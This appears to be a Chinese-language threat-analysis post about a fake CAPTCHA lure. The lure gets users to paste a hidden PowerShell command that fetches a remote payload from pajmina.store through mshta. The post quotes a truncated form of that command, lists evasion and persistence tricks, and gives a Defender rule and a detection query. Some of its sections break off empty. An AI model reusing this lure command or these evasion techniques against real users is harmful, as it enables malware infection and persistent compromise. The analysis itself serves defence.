攻击者以"CAPTCHA验证"(验证码校验)为诱饵,诱导用户执行恶意PowerShell指令,通过多阶段隐蔽加载技术实施网络攻击。
powershell -w 1 -C "$l='https://pajmina.store/...';Invoke-CimMethod ..."
-w 1
使PowerShell窗口处于隐藏状态('ms' + 'hta' + '.exe')
规避基础字符串检测Invoke-CimMethod
替代传统Start-Process
,绕过部分行为监控组件 | 技术细节 | 规避检测手段 |
---|---|---|
mshta.exe | 执行远程HTA应用 | 白名单程序滥用 |
.m4a扩展名 | 伪造成音频文件的恶意脚本 | 文件类型混淆 |
域名策略 | 使用新注册的.store域名 | 规避信誉评分系统 |
攻击成功后会建立以下持久化通道:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# 启用攻击面缩减规则(ASR)
Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Enabled
// Microsoft Defender高级查询
DeviceProcessEvents
| where FileName in~ ("mshta.exe", "powershell.exe")
| where ProcessCommandLine has_any (".m4a", "Invoke-CimMethod", "-WindowStyle Hidden")
本次事件中攻击者使用了三阶段混淆技术:
该案例验证了MITRE ATT&CK框架中的:
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。